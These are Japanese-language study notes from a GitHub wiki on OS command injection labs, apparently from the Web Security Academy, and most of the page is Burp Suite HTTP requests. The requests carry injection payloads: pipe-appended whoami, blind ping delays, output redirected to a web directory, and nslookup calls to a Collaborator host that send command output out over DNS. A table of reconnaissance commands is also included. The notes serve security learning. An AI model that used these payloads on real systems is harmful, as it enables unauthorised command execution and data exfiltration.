BurpSuite_OS commnad injection - meruneru/tech_memo GitHub Wiki
サーバ上でコマンドを実行させるテクニック
例えば、https://insecure-website.com/stockStatus?productID=381&storeID=29にアクセスする際のリクエストを細工することを考える。
サーバー側で、productID/storedIDがそのままコマンド引数に渡されている場合、 パイプを使うことで任意のコマンドを実行できることになる。
POST /product/stock HTTP/1.1
Host: ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net
Cookie: session=MwmFcM7lsKrfjTEACxYjTdkCPVmfzAce
Content-Length: 21
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac491fc11eda67bdc0ed1bcf00d2000a.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
productId=1&storeId=1|whoami
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operateing System | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Runnning processes | ps -ef | tasklist |
コマンド実行結果をそのままサーバがクライアント側に返すとは限らない。
pingの応答10秒を待って画面が変わるか確かめることで、 Blind OS command injectionができるかどうか調べる。
POST /feedback/submit HTTP/1.1
Host: ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net
Cookie: session=i2LM41SGuKygsi4jKa94KSHNgJgqzcjR
Content-Length: 92
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac5c1f0e1f2e5cadc0492ecc00b8009c.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
csrf=hgz3R1WbgdCg9jO89EJs4cJOjIL2bT4B&name=aaa&email=bbb%40gmail.com||ping+-c+10+127.0.0.1||&subject=ccc&message=ddd
Blind command injectionの結果をファイルにリダイレクトして、あとでそのファイルをGetする問題。
feedback投稿ページにBlind command injectionができる箇所がある。
emailの末尾に||whoami>/var/www/images/output.txt||を追加する。
```text
POST /feedback/submit HTTP/1.1
Host: ace21fb71fe801eec0021288009700ef.web-security-academy.net
Cookie: session=t4rq4wwcMwQHuAlbfyNgUWeIBm3wqWtU
Content-Length: 92
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
csrf=710tDGHnN1E0QRUAg88EBUkDb2R9JSUu&name=aa&email=ss%40gmail.com||whoami>/var/www/images/output.txt||&subject=ssss&message=mmmm
あとは、imageファイルを画面に表示する問題で、output.txtに書き換えて取得すればOK。
GET /image?filename=output.txt HTTP/1.1
Host: ace21fb71fe801eec0021288009700ef.web-security-academy.net
Cookie: session=t4rq4wwcMwQHuAlbfyNgUWeIBm3wqWtU
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ace21fb71fe801eec0021288009700ef.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
解けていない。 pro版にあるBurp Collaborator client機能を使う解説だった。
||nslookup+<collaboratorのURL>||
||nslookup+whoami.<collaboratorのURL>||
POST /feedback/submit HTTP/1.1
Host: ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net
Cookie: session=ve8Ku5A9o5hicNtxucfPFfpsXChGSEik
Content-Length: 88
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac901f9d1f05c5a2c02f3c110067007d.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Connection: close
csrf=iDnIWDb1BXUX2ouFF3LVNSVfPRWXDk1o&name=d&email=a%40gmail.com||nslookup+<collaboratorのURL>||&subject=sss&message=aaa